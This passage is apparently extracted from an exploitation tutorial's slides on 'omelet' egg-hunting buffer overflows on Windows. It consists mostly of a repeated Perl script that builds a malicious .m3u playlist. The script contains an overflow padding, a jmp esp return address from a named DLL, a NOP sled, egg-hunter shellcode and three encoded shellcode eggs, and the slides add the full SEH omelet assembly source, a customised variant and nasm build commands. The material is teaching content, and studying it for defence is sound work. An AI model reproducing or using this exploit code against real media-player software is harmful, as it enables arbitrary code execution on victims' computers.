my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
jump to shell code
omit…
![Page 63: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/63.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
omit… omelet code for finding eggs
for nop sled
![Page 64: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/64.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
omit… omelet code for finding eggs
for nop sled
EDI → 0x00000000
![Page 65: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/65.jpg)
start: XOR EDI, EDI jmp SHORT reset_stack
create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg
reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
EDI → 0x00000000
Access Violation
![Page 66: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/66.jpg)
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg1.bin"!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg2.bin"!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg3.bin"
egg1
egg2
egg3
![Page 67: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/67.jpg)
egg1 (0x000FDxxx)
egg2 (0x000FDxxx)
egg3 (0x000FDxxx)
![Page 68: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/68.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1 my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7". “\xD1\xE7\xD1\xE7”; #0x1F80 shift x 7
my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
![Page 69: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/69.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1
my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7". “\xD1\xE7\xD1\xE7”; #0x1F80 shift x 7
my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
![Page 70: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/70.jpg)
omit…
![Page 71: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/71.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1
![Page 72: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/72.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1
![Page 73: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/73.jpg)
start: XOR EDI, EDI jmp SHORT reset_stack
create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg
reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
![Page 74: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/74.jpg)
start: XOR EDI, EDI jmp SHORT reset_stack
create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg
reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
![Page 75: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/75.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1
![Page 76: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/76.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
![Page 77: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/77.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm BITS 32
; egg: ; LL II M1 M2 M3 DD DD DD ... (LL * DD) ; LL == Size of eggs (same for all eggs) ; II == Index of egg (different for each egg) ; M1,M2,M3 == Marker byte (same for all eggs) ; DD == Data in egg (different for each egg)
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
db marker_bytes_location db max_index_location db egg_size_location
![Page 78: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/78.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm build C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHun ting\w32 SEH omelet shellcode v0>"c:\Program Files\nasm\nasm.exe" -f bin -o cust om_w32_SEH_omelet.bin custom_w32_SEH_omelet.asm -w+error
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHun ting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py custom_w32_SEH_omelet.bin she llcode.bin calceggs_custom.txt 127 0xBADA55
